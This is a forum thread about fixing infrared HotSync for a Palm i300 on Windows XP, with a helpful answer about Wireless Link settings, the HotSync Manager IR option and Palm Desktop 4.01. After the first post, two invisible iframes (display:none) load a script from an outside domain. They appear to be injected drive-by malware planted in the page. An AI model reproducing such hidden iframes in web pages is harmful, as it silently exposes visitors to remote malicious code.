+ Reply to Thread

IR Hotsync Problems

Hello,

I am having a problem with the Hotsync operation using the IR port. I can sync my I300 when it is in the cradle, but does not seem to work when I try it with the IR port setting. I have a good connection through the IR port on my computer... and i shows the Wireless link icon and menu, but it will not allow the sync operation. Do I need to configure a COM port to accept the IR connections?

I am using Windows XP... Does this matter?

Any help would be appreciated.

Thanks,

Russ<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: IR Hotsync Problems

Originally posted by russdog
    Hello,

I am having a problem with the Hotsync operation using the IR port. I can sync my I300 when it is in the cradle, but does not seem to work when I try it with the IR port setting. I have a good connection through the IR port on my computer... and i shows the Wireless link icon and menu, but it will not allow the sync operation. Do I need to configure a COM port to accept the IR connections?

I am using Windows XP... Does this matter?

Any help would be appreciated.

Thanks,

Russ
    Go into the Control Panel->Wireless Link, Image Transfer tab, turn off the "Use Wireless Link to transfer images from a digital camera...". At least this is the procedure for Win2K.

Also, right mouse the HotSync icon in the system tray and make sure I/R is checked.

I think you found my probelm! I do not have the IR choice on the hotsync system tray!

Any ideas of hot to find that?

Thanks!

Originally posted by russdog
    I think you found my probelm! I do not have the IR choice on the hotsync system tray!

Any ideas of hot to find that?

Thanks!
    First, you must stop and start the HotSync Manager after doing that setting change I told you about earlier.

Second, make sure you are running Palm Desktop 4.01. Get it from www.palm.net, or wherever.

it works!!!! Thanks for all your help!